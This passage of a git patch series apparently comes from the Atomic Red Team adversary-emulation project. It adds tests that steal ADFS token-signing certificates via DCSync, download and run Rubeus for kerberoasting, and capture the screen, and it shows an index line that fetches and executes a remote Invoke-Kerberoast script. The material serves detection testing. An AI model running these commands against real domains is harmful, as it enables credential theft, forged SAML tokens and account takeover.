   - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
+  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
+  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 280d6c9c..64ae0f2b 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -5129,6 +5129,99 @@ credential-access:
 
 '
         name: sh
+    - name: ADFS token signing and encryption certificates theft - Local
+      auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
+      description: |
+        Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+        Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AADInternals module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AADInternals -Force
+
+'
+      executor:
+        command: |
+          Import-Module AADInternals -Force
+          Export-AADIntADFSCertificates
+          Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+          Write-Host "`nCertificates retrieved successfully"
+        cleanup_command: |
+          Remove-Item -Path ".\ADFS_encryption.pfx"
+          Remove-Item -Path ".\ADFS_signing.pfx"
+        name: powershell
+    - name: ADFS token signing and encryption certificates theft - Remote
+      auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+      description: |
+        Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+        Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+      supported_platforms:
+      - windows
+      input_arguments:
+        adfs_service_account_name:
+          description: Name of the ADFS service account
+          type: String
+          default: adfs_svc
+        replication_user:
+          description: Username with replication rights. It can be the Domain Admin
+            running the script
+          type: String
+          default: Administrator
+        replication_password:
+          description: Password of replication_username
+          type: String
+          default: ReallyStrongPassword
+        adfs_server_name:
+          description: Name of an ADFS server
+          type: String
+          default: sts.contoso.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AADInternals and ActiveDirectory modules must be installed.
+
+'
+        prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable
+          -Name ActiveDirectory)) {echo 0} else {echo 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AADInternals -Force
+
+'
+      executor:
+        command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals
+          -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc
+          = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object
+          name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString
+          -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object
+          -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user},
+          $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash
+          = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential
+          -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration
+          -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get
+          certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group =
+          $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container
+          = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent
+          = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base
+          = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter
+          = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\")
+          | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"]
+          \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\")
+          | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne()
+          \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted
+          certificates from configuration and decrypt them\nExport-AADIntADFSCertificates
+          -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like
+          \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n"
+        cleanup_command: |
+          Remove-Item -Path ".\ADFS_encryption.pfx"
+          Remove-Item -Path ".\ADFS_signing.pfx"
+        name: powershell
   T1003.007:
     technique:
       external_references:
diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md
index 4387c051..23998a59 100644
--- a/atomics/T1552.004/T1552.004.md
+++ b/atomics/T1552.004/T1552.004.md
@@ -20,6 +20,10 @@ Some private keys require a password or passphrase for operation, so an adversar
 
 - [Atomic Test #5 - Copy the users GnuPG directory with rsync](#atomic-test-5---copy-the-users-gnupg-directory-with-rsync)
 
+- [Atomic Test #6 - ADFS token signing and encryption certificates theft - Local](#atomic-test-6---adfs-token-signing-and-encryption-certificates-theft---local)
+
+- [Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote](#atomic-test-7---adfs-token-signing-and-encryption-certificates-theft---remote)
+
 
 <br/>
 
@@ -204,4 +208,137 @@ rm -rf #{output_folder}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - ADFS token signing and encryption certificates theft - Local
+Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 78e95057-d429-4e66-8f82-0f060c1ac96f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module AADInternals -Force
+Export-AADIntADFSCertificates
+Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+Write-Host "`nCertificates retrieved successfully"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path ".\ADFS_encryption.pfx"
+Remove-Item -Path ".\ADFS_signing.pfx"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AADInternals module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AADInternals) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AADInternals -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote
+Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cab413d8-9e4a-4b8d-9b84-c985bd73a442
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| adfs_service_account_name | Name of the ADFS service account | String | adfs_svc|
+| replication_user | Username with replication rights. It can be the Domain Admin running the script | String | Administrator|
+| replication_password | Password of replication_username | String | ReallyStrongPassword|
+| adfs_server_name | Name of an ADFS server | String | sts.contoso.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module ActiveDirectory -Force 
+Import-Module AADInternals -Force | Out-Null
+#Get Configuration
+$dcServerName = (Get-ADDomainController).HostName
+$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
+$PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+# use DCSync to fetch the ADFS service account's NT hash
+$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
+$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
+# Get certificates decryption key
+$Configuration = [xml]$ADFSConfig
+$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
+$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
+$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
+$base = "LDAP://CN=$group,$container,$parent"
+$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
+$ADSearch.Filter = '(name=CryptoPolicy)'
+$ADSearch.PropertiesToLoad.Clear()
+$ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
+$aduser = $ADSearch.FindOne()
+$keyObjectGuid = $ADUser.Properties["displayName"] 
+$ADSearch.PropertiesToLoad.Clear()
+$ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
+$ADSearch.Filter="(l=$keyObjectGuid)"
+$aduser=$ADSearch.FindOne() 
+$key=[byte[]]$aduser.Properties["thumbnailphoto"][0] 
+# Get encrypted certificates from configuration and decrypt them
+Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
+Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+Write-Host "`nCertificates retrieved successfully"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path ".\ADFS_encryption.pfx"
+Remove-Item -Path ".\ADFS_signing.pfx"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AADInternals and ActiveDirectory modules must be installed.
+##### Check Prereq Commands:
+```powershell
+if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AADInternals -Force
+```
+
+
+
+
 <br/>

From ad98393d8b44d02f422e76927901e8ea30b71c96 Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Fri, 20 Aug 2021 15:17:49 -0500
Subject: [PATCH 32/39] rubeus-kerberoasting (#1609)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1558.003/T1558.003.yaml | 48 ++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)

diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml
index 58abe080..597849a6 100644
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -26,3 +26,51 @@ atomic_tests:
       Invoke-Kerberoast | fl
     name: powershell
 
+- name: Rubeus kerberoast
+  description: |
+    Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+    This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of Rubeus executable
+      type: Path
+      default: $Env:temp
+    local_executable:
+      description: name of the rubeus executable
+      type: String
+      default: 'rubeus.exe'
+    out_file:
+      description: file where command results are stored
+      type: String
+      default: rubeus_output.txt
+    rubeus_url:
+      description: URL of Rubeus executable
+      type: url
+      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+    flags:
+      description: command flags you would like to run (optional and blank by default)
+      type: String
+      default: 
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually
+  - description: |
+      Rubeus must exist
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+  executor:
+    command: |
+      cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: false
\ No newline at end of file

From 2b02f773326ddef8f406ddcaf0e59d341cef9d30 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Fri, 20 Aug 2021 20:18:17 +0000
Subject: [PATCH 33/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1558.003/T1558.003.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml
index 597849a6..e389ff38 100644
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -27,6 +27,7 @@ atomic_tests:
     name: powershell
 
 - name: Rubeus kerberoast
+  auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55
   description: |
     Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
     This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index b3f3a3cb..8b43e97c 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -766,3 +766,4 @@ aa6cb8c4-b582-4f8e-b677-37733914abda
 615bd568-2859-41b5-9aed-61f6a88e48dd
 78e95057-d429-4e66-8f82-0f060c1ac96f
 cab413d8-9e4a-4b8d-9b84-c985bd73a442
+14625569-6def-4497-99ac-8e7817105b55

From 69aa9d859d20199b10e22e6b97f8296dfb23f9b3 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 20 Aug 2021 20:18:22 +0000
Subject: [PATCH 34/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 62 ++++++++++++++++++
 atomics/T1558.003/T1558.003.md                | 65 +++++++++++++++++++
 6 files changed, 131 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index fd3686a6..e97b9bff 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -28,6 +28,7 @@ credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tic
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
+credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c02a3d0f..dd925884 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -16,6 +16,7 @@ credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tic
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
+credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index a61424e2..0b8ffec9 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -53,6 +53,7 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
+  - Atomic Test #2: Rubeus kerberoast [windows]
 - [T1555.001 Keychain](../../T1555.001/T1555.001.md)
   - Atomic Test #1: Keychain [macos]
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 61d8b1ed..b4e18773 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -37,6 +37,7 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
+  - Atomic Test #2: Rubeus kerberoast [windows]
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #1: Input Capture [windows]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 64ae0f2b..4e12228a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2420,6 +2420,68 @@ credential-access:
           iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
           Invoke-Kerberoast | fl
         name: powershell
+    - name: Rubeus kerberoast
+      auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55
+      description: |
+        Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+        This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+      supported_platforms:
+      - windows
+      input_arguments:
+        local_folder:
+          description: Local path of Rubeus executable
+          type: Path
+          default: "$Env:temp"
+        local_executable:
+          description: name of the rubeus executable
+          type: String
+          default: rubeus.exe
+        out_file:
+          description: file where command results are stored
+          type: String
+          default: rubeus_output.txt
+        rubeus_url:
+          description: URL of Rubeus executable
+          type: url
+          default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+        flags:
+          description: command flags you would like to run (optional and blank by
+            default)
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually
+
+'
+      - description: 'Rubeus must exist
+
+'
+        prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+
+'
+      executor:
+        command: 'cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags}
+          /outfile:"#{local_folder}\#{out_file}"
+
+'
+        cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: false
   T1555.001:
     technique:
       created: '2020-02-12T18:55:24.728Z'
diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md
index a2b11589..e019ef1f 100644
--- a/atomics/T1558.003/T1558.003.md
+++ b/atomics/T1558.003/T1558.003.md
@@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
 
 - [Atomic Test #1 - Request for service tickets](#atomic-test-1---request-for-service-tickets)
 
+- [Atomic Test #2 - Rubeus kerberoast](#atomic-test-2---rubeus-kerberoast)
+
 
 <br/>
 
@@ -61,4 +63,67 @@ Write-Host Joining this computer to a domain must be done manually
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Rubeus kerberoast
+Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 14625569-6def-4497-99ac-8e7817105b55
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| local_folder | Local path of Rubeus executable | Path | $Env:temp|
+| local_executable | name of the rubeus executable | String | rubeus.exe|
+| out_file | file where command results are stored | String | rubeus_output.txt|
+| rubeus_url | URL of Rubeus executable | url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe|
+| flags | command flags you would like to run (optional and blank by default) | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+##### Description: Rubeus must exist
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+```
+
+
+
+
 <br/>

From 9da37dabc8e58680b3eb1f57da31488e8927f5e3 Mon Sep 17 00:00:00 2001
From: gregclermont <580609+gregclermont@users.noreply.github.com>
Date: Mon, 23 Aug 2021 23:06:58 +0200
Subject: [PATCH 35/39] Add T1113 test for CopyFromScreen API (#1610)

---
 atomics/T1113/T1113.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)

diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml
index 47c3a3db..9124542a 100644
--- a/atomics/T1113/T1113.yaml
+++ b/atomics/T1113/T1113.yaml
@@ -118,3 +118,26 @@ atomic_tests:
       cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
     cleanup_command: |
       rm #{output_file} -ErrorAction Ignore
+- name: Windows Screen Capture (CopyFromScreen)
+  description: |
+    Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
+
+    [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: $env:TEMP\T1113.png
+  executor:
+    command: |
+      Add-Type -AssemblyName System.Windows.Forms
+      $screen = [Windows.Forms.SystemInformation]::VirtualScreen
+      $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
+      $graphic = [Drawing.Graphics]::FromImage($bitmap)
+      $graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
+      $bitmap.Save("#{output_file}")
+    cleanup_command: |
+      Remove-Item #{output_file} -ErrorAction Ignore
+    name: powershell

From 049c18afadff8b4be83463b00cd08ee4ad8a0bf4 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 23 Aug 2021 21:07:15 +0000
Subject: [PATCH 36/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1113/T1113.yaml | 1 +
 atomics/used_guids.txt   | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml
index 9124542a..a5771922 100644
--- a/atomics/T1113/T1113.yaml
+++ b/atomics/T1113/T1113.yaml
@@ -119,6 +119,7 @@ atomic_tests:
     cleanup_command: |
       rm #{output_file} -ErrorAction Ignore
 - name: Windows Screen Capture (CopyFromScreen)
+  auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
   description: |
     Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 8b43e97c..44f1a720 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -767,3 +767,4 @@ aa6cb8c4-b582-4f8e-b677-37733914abda
 78e95057-d429-4e66-8f82-0f060c1ac96f
 cab413d8-9e4a-4b8d-9b84-c985bd73a442
 14625569-6def-4497-99ac-8e7817105b55
+e9313014-985a-48ef-80d9-cde604ffc187

From c2601f14ed273d13043f6002dfdb0cafc88004c9 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 23 Aug 2021 21:07:19 +0000
Subject: [PATCH 37/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 25 ++++++++++
 atomics/T1113/T1113.md                        | 46 +++++++++++++++++++
 6 files changed, 75 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e97b9bff..48fab1bd 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -118,6 +118,7 @@ collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
 collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
+collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index dd925884..49009341 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -78,6 +78,7 @@ collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
+collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
